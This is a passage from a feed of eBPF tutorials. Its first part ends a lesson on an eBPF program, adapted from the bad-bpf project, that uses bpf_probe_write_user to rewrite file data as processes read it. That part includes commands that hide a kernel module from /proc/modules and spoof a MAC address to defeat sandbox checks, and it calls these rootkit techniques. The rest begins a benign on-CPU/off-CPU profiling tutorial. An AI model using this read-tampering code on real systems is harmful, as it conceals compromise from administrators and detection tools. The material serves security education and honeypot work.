    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Loop over every address to replace text into&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;// Attempt to overwrite data with out replace string (minus the end null bytes)&lt;/span&gt;
        &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_probe_write_user&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;text_replace&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="c1"&gt;// Send event&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
            &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | [*] replaced: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="c1"&gt;// Clean up map now we're done&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The program starts with the familiar pattern of tracking file opens. When a process opens our target file (specified via the &lt;code&gt;filename&lt;/code&gt; constant), we record its file descriptor in &lt;code&gt;map_fds&lt;/code&gt;. This lets us identify reads from that specific file later.&lt;/p&gt;

&lt;p&gt;The interesting part begins in &lt;code&gt;handle_read_enter&lt;/code&gt;, where we capture the buffer address that userspace passed to the &lt;code&gt;read()&lt;/code&gt; system call. This address is where the kernel will write the file contents, and crucially, it's also where we can modify them before the userspace process looks at the data.&lt;/p&gt;

&lt;p&gt;The main logic lives in &lt;code&gt;find_possible_addrs&lt;/code&gt;, attached to &lt;code&gt;sys_exit_read&lt;/code&gt;. After the kernel completes the read operation, we scan through the buffer looking for potential matches. The constraint here is that we can't do unbounded loops—the verifier would reject that. So we read in chunks of &lt;code&gt;LOCAL_BUFF_SIZE&lt;/code&gt; bytes and scan for the first character of our search string. Each potential match address goes into &lt;code&gt;map_name_addrs&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Once we've scanned the buffer, we use a tail call to jump into &lt;code&gt;check_possible_addresses&lt;/code&gt;. This program iterates through the potential matches and performs full string comparison using &lt;code&gt;bpf_strncmp&lt;/code&gt; (available in kernel 5.17+). Confirmed matches move to &lt;code&gt;map_to_replace_addrs&lt;/code&gt;. If we found any matches, we tail-call once more into &lt;code&gt;overwrite_addresses&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The final stage, &lt;code&gt;overwrite_addresses&lt;/code&gt;, performs the actual modification using &lt;code&gt;bpf_probe_write_user&lt;/code&gt;. It loops through confirmed match locations and overwrites each one with the replacement text. The requirement that both strings have the same length prevents buffer corruption—we're doing in-place replacement without shifting any memory.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tail Calls and Verifier Constraints
&lt;/h2&gt;

&lt;p&gt;The use of tail calls (&lt;code&gt;bpf_tail_call&lt;/code&gt;) is critical here. eBPF programs face strict complexity limits—the verifier analyzes every possible execution path to ensure the program terminates and doesn't access invalid memory. A single program that does scanning, matching, and replacement would exceed these limits.&lt;/p&gt;

&lt;p&gt;Tail calls provide a way to chain programs while bypassing the cumulative instruction count. When &lt;code&gt;find_possible_addrs&lt;/code&gt; calls &lt;code&gt;bpf_tail_call(ctx, &amp;amp;map_prog_array, PROG_01)&lt;/code&gt;, it's essentially jumping to a different program (&lt;code&gt;check_possible_addresses&lt;/code&gt;) with the same context. The current program's execution ends, and the new program starts with a fresh instruction count budget.&lt;/p&gt;

&lt;p&gt;The userspace loader must populate &lt;code&gt;map_prog_array&lt;/code&gt; with file descriptors for the tail-called programs before attaching anything. This is done in the userspace code using &lt;code&gt;bpf_map_update_elem&lt;/code&gt;, mapping index &lt;code&gt;PROG_01&lt;/code&gt; to the &lt;code&gt;check_possible_addresses&lt;/code&gt; program and &lt;code&gt;PROG_02&lt;/code&gt; to &lt;code&gt;overwrite_addresses&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This architecture demonstrates a key eBPF development pattern: when you hit verifier limits, split your logic into multiple programs and use tail calls to coordinate them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Examples and Security Implications
&lt;/h2&gt;

&lt;p&gt;Let's look at real-world use cases. Hiding kernel modules from detection:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./replace &lt;span class="nt"&gt;-f&lt;/span&gt; /proc/modules &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'joydev'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'cryptd'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When any process reads &lt;code&gt;/proc/modules&lt;/code&gt;, they'll see &lt;code&gt;cryptd&lt;/code&gt; where &lt;code&gt;joydev&lt;/code&gt; actually appears. The module is still loaded and functioning, but tools like &lt;code&gt;lsmod&lt;/code&gt; can't see it. This is a classic rootkit technique.&lt;/p&gt;

&lt;p&gt;Spoofing MAC addresses for anti-sandbox evasion:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./replace &lt;span class="nt"&gt;-f&lt;/span&gt; /sys/class/net/eth0/address &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'00:15:5d:01:ca:05'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'00:00:00:00:00:00'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Malware often checks for virtualization by looking at MAC address prefixes (0x00:15:5d indicates Hyper-V). By replacing the actual MAC address with zeros, the malware's virtualization detection fails, making sandbox analysis easier.&lt;/p&gt;

&lt;p&gt;The defensive flip side is using this for honeypot systems. You can present fake credentials in configuration files, or make malware believe it successfully compromised a system when it hasn't. The file content on disk remains secure, but attackers reading it see false information.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Compile the program:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;src/27-replace
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run with specified file and text replacement:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./replace &lt;span class="nt"&gt;--filename&lt;/span&gt; /path/to/file &lt;span class="nt"&gt;--input&lt;/span&gt; foo &lt;span class="nt"&gt;--replace&lt;/span&gt; bar
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Both &lt;code&gt;input&lt;/code&gt; and &lt;code&gt;replace&lt;/code&gt; must be the same length to avoid buffer corruption. To include newlines in bash, use &lt;code&gt;$'\n'&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./replace &lt;span class="nt"&gt;-f&lt;/span&gt; /proc/modules &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'joydev'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;$'aaaa&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The program intercepts all reads of the specified file and replaces matching text transparently. Press Ctrl-C to stop.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;This tutorial demonstrated how eBPF programs can intercept file read operations and modify data before userspace sees it, without altering the actual file. We explored the three-stage architecture using tail calls to work within verifier constraints, the use of &lt;code&gt;bpf_probe_write_user&lt;/code&gt; for memory manipulation, and practical applications ranging from rootkit techniques to defensive honeypot deployment. Understanding these patterns is crucial for both offensive security research and building detection mechanisms that account for eBPF-based attacks.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Original bad-bpf project: &lt;a href="https://github.com/pathtofile/bad-bpf" rel="noopener noreferrer"&gt;https://github.com/pathtofile/bad-bpf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;eBPF tail calls documentation: &lt;a href="https://docs.kernel.org/bpf/prog_sk_lookup.html" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/prog_sk_lookup.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;BPF verifier and program complexity: &lt;a href="https://www.kernel.org/doc/html/latest/bpf/verifier.html" rel="noopener noreferrer"&gt;https://www.kernel.org/doc/html/latest/bpf/verifier.html&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ebpf</category>
      <category>kernel</category>
      <category>tracing</category>
    </item>
    <item>
      <title>eBPF Tutorial by Example 32: Wall Clock Profiling with Combined On-CPU and Off-CPU Analysis</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 16 Dec 2025 07:16:59 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-32-wall-clock-profiling-with-combined-on-cpu-and-off-cpu-analysis-2jcm</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-32-wall-clock-profiling-with-combined-on-cpu-and-off-cpu-analysis-2jcm</guid>
      <description>&lt;p&gt;Performance bottlenecks can hide in two very different places. Your code might be burning CPU cycles in hot loops, or it might be sitting idle waiting for I/O, network responses, or lock contention. Traditional profilers often focus on just one side of this story. But what if you could see both at once?&lt;/p&gt;

&lt;p&gt;This tutorial introduces a complete wall clock profiling solution that combines on-CPU and off-CPU analysis using eBPF. We'll show you how to capture the full picture of where your application spends its time, using two complementary eBPF programs that work together to account for every microsecond of execution. Whether your performance problems come from computation or waiting, you'll be able to spot them in a unified flame graph view.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/32-wallclock-profiler" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/32-wallclock-profiler&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Understanding Wall Clock Profiling
&lt;/h2&gt;

&lt;p&gt;Wall clock time is the actual elapsed time from start to finish, like checking a stopwatch. For any running process, this time gets divided into two categories. On-CPU time is when your code actively executes on a processor, doing real work. Off-CPU time is when your process exists but isn't running, waiting for something like disk I/O, network packets, or acquiring a lock.&lt;/p&gt;

&lt;p&gt;Traditional CPU profilers only show you the on-CPU story. They sample the stack at regular intervals when your code runs, building a picture of which functions consume CPU cycles. But these profilers are blind to off-CPU time. When your thread blocks on a system call or waits for a mutex, the profiler stops seeing it. This creates a massive blind spot for applications that spend significant time waiting.&lt;/p&gt;

&lt;p&gt;Off-CPU profilers flip the problem around. They track when threads go to sleep and wake up, measuring blocked time and capturing stack traces at blocking points. This reveals I/O bottlenecks and lock contention. But they miss pure computation problems.&lt;/p&gt;

&lt;p&gt;The tools in this tutorial solve both problems by running two eBPF programs simultaneously. The &lt;code&gt;oncputime&lt;/code&gt; tool samples on-CPU execution using perf events. The &lt;code&gt;offcputime&lt;/code&gt; tool hooks into the kernel scheduler to catch blocking operations. A Python script combines the results, normalizing the time scales so you can see CPU-intensive code paths (marked red) and blocking operations (marked blue) in the same flame graph. This complete view shows where every microsecond goes.&lt;/p&gt;

&lt;p&gt;Here's an example flame graph showing combined on-CPU and off-CPU profiling results:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2Feunomia-bpf%2Fbpf-developer-tutorial%2Fc9d3d65c15fb6528ee378657a05ec0b062eff5b7%2Fsrc%2F32-wallclock-profiler%2Ftests%2Fexample.svg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2Feunomia-bpf%2Fbpf-developer-tutorial%2Fc9d3d65c15fb6528ee378657a05ec0b062eff5b7%2Fsrc%2F32-wallclock-profiler%2Ftests%2Fexample.svg" alt="Combined Wall Clock Flame Graph Example" width="1200" height="582"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In this visualization, you can clearly see the distinction between CPU-intensive work (shown in red/warm colors marked with &lt;code&gt;_[c]&lt;/code&gt;) and blocking operations (shown in blue/cool colors marked with &lt;code&gt;_[o]&lt;/code&gt;). The relative widths immediately reveal where your application spends its wall clock time.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Tools: oncputime and offcputime
&lt;/h2&gt;

&lt;p&gt;This tutorial provides two complementary profiling tools. The &lt;code&gt;oncputime&lt;/code&gt; tool samples your process at regular intervals using perf events, capturing stack traces when code actively runs on the CPU. At a default rate of 49 Hz, it wakes up roughly every 20 milliseconds to record where your program is executing. Higher sample counts in the output indicate more CPU time spent in those code paths.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;offcputime&lt;/code&gt; tool takes a different approach. It hooks into the kernel scheduler's context switch mechanism, specifically the &lt;code&gt;sched_switch&lt;/code&gt; tracepoint. When your thread goes off-CPU, the tool records a timestamp and captures the stack trace showing why it blocked. When the thread returns to running, it calculates how long the thread was sleeping. This directly measures I/O waits, lock contention, and other blocking operations in microseconds.&lt;/p&gt;

&lt;p&gt;Both tools use BPF stack maps to efficiently capture kernel and user space call chains with minimal overhead. They aggregate results by unique stack traces, so repeated execution of the same code path gets summed together. The tools can filter by process ID, thread ID, and various other criteria to focus analysis on specific parts of your application.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Kernel-Space eBPF Programs
&lt;/h2&gt;

&lt;p&gt;Let's examine how these tools work at the eBPF level. We'll start with the on-CPU profiler, then look at the off-CPU profiler, and see how they complement each other.&lt;/p&gt;

&lt;h3&gt;
  
  
  On-CPU Profiling with oncputime
&lt;/h3&gt;

&lt;p&gt;The on-CPU profiler uses perf events to sample execution at regular time intervals. Here's the complete eBPF program:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"oncputime.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;kernel_stacks_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;user_stacks_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;include_idle&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_STACK_TRACE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;stackmap&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_ENTRIES&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
